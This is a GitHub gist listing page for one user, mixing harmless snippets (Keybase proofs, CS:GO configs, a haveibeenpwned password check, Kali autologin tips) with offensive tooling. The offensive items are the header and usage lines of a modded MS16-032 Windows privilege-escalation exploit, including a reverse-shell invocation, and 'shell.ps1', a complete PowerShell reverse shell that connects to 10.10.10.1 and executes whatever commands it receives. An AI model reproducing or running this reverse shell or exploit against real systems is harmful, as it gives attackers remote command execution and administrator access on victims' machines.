Skip to content

Instantly share code, notes, and snippets.

@thalex
thalex / Keybase proof
Last active September 12, 2019 10:05
### Keybase proof
I hereby claim:
* I am thalex on github.
* I am thales (https://keybase.io/thales) on keybase.
* I have a public key whose fingerprint is 22E4 0364 C7A5 50BE FE1C C6CD 525F 3513 9F05 AAEE
To claim this, I am signing this object:
@thalex
thalex / autoexec_individual.cfg
Created May 16, 2018 21:31
CS:GO autoexec_individual.cfg -> ~/Biblioteca/Application Support/Steam/steamapps/common/Counter-Strike Global Offensive/csgo/cfg
// -------------------------------------------------------------------------------
// ----------------- GLOBAL ELITE CONFIG BY BossAmBlock --------------------------
// ----------------- A COMPOSITION OF THE WORLDS BEST PLAYERS CONFIGS ------------
// -------------------------------------------------------------------------------
// ----------------- INDIVIDUAL SETTINGS CONFIG ----------------------------------
// http://www.gamerconfig.eu/config/counter-strike-global-offensive/global+elite+config+by+bossamblock+updated+01062016,1787/#file0 //
bind "a" "+moveleft; ToggleTag"
bind "d" "+moveright; ToggleTag"
bind "s" "+back; ToggleTag"
@thalex
thalex / autoexec.cfg
Created May 16, 2018 21:30
CS:GO autoexec.cfg -> ~/Biblioteca/Application Support/Steam/steamapps/common/Counter-Strike Global Offensive/csgo/cfg
// -------------------------------------------------------------------------------
// ----------------- GLOBAL ELITE CONFIG BY BossAmBlock --------------------------
// ----------------- A COMPOSITION OF THE WORLDS BEST PLAYERS CONFIGS ------------
// -------------------------------------------------------------------------------
// ----------------- RESOLUTION: 1600x1200 (STRETCHED TO 16:9) -------------------
// ----------------- WINDOWS MOUSE SETTINGS: 6/11 , 800 DPI ----------------------
// ----------------- LAUNCH: -console -novid -high +exec autoexec ----------------
// -------------------------------------------------------------------------------
clear
// -------------------------------------------------------------------------------
@thalex
thalex / leakcheck_kanonymity.txt
Created April 24, 2018 14:22 — forked from intrd/leakcheck_kanonymity.txt
One-liner password leak check + k-anonymity method (w/out exposing the password on request)
## One-liner password leak check + k-anonymity method (w/out exposing the password on request)
# Compute the SHA1, Grab 1st 5 chars of the hash, check by range on huge haveibeenpwnd DB!
# original source: https://news.ycombinator.com/item?id=16432344
VARPWD='test123'; HASH=`echo -n $VARPWD | sha1sum`; curl --silent https://api.pwnedpasswords.com/range/`cut -b 1-5 <(echo $HASH)` --stderr - | grep -i `cut -b 6- <(echo $HASH) | cut -d ' ' -f 1`
@thalex
thalex / rpi_kali
Last active April 25, 2018 20:49
RPI3 + Kali Linux Tips
# Autologin
editar o arquivo -> /etc/gdm3/daemon.conf e descomentar as linhas abaixo:
AutomaticLoginEnable = true
AutomaticLogin = root

Keybase proof

I hereby claim:

  • I am dbaser on github.
  • I am thales (https://keybase.io/thales) on keybase.
  • I have a public key ASCG01CaC6pQKatyOZt6TafWJqM7BEwAMrKmE9TePW6k3wo

To claim this, I am signing this object:

@thalex
thalex / ms16_032_intrd_mod.ps1
Created June 24, 2017 15:32 — forked from intrd/ms16_032_intrd_mod.ps1
MS16-032 priv escalation exploit modded - interactive shell & command argv
## intrd's MS16-032 priv escalation exploit modded - interactive shell & command argv
# exploit MS16-032 and run shell.ps1(ATTACHMNT) as administrator: Invoke-MS16-032 "-NoProfile -ExecutionPolicy Bypass -Command Import-Module C:\Users\IEUser\Desktop\shell.ps1;Start-Sleep -s 10"
# reverse shell as current user: Invoke-PowerShellTcp -Reverse -IPAddress 10.0.3.10 -Port 4567
function Invoke-MS16-032 {
<#
.SYNOPSIS
PowerShell implementation of MS16-032. The exploit targets all vulnerable
function Invoke-MS16-032 {
<#
.SYNOPSIS
PowerShell implementation of MS16-032. The exploit targets all vulnerable
operating systems that support PowerShell v2+. Credit for the discovery of
the bug and the logic to exploit it go to James Forshaw (@tiraniddo) and @Fuzzysec for the original PS script.
Modifications by Mike Benich (@benichmt1).
Targets:
@thalex
thalex / shell.ps1
Created June 24, 2017 15:15
A reverse shell in Powershell
$intrd = New-Object System.Net.Sockets.TCPClient("10.10.10.1",1234);$stream = $intrd.GetStream();[byte[]]$bytes = 0..255|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$intrd.Close()
@thalex
thalex / gitupdate
Created April 30, 2017 17:16
Update all git projects
find . -mindepth 1 -maxdepth 1 -type d -print -exec git -C {} pull \;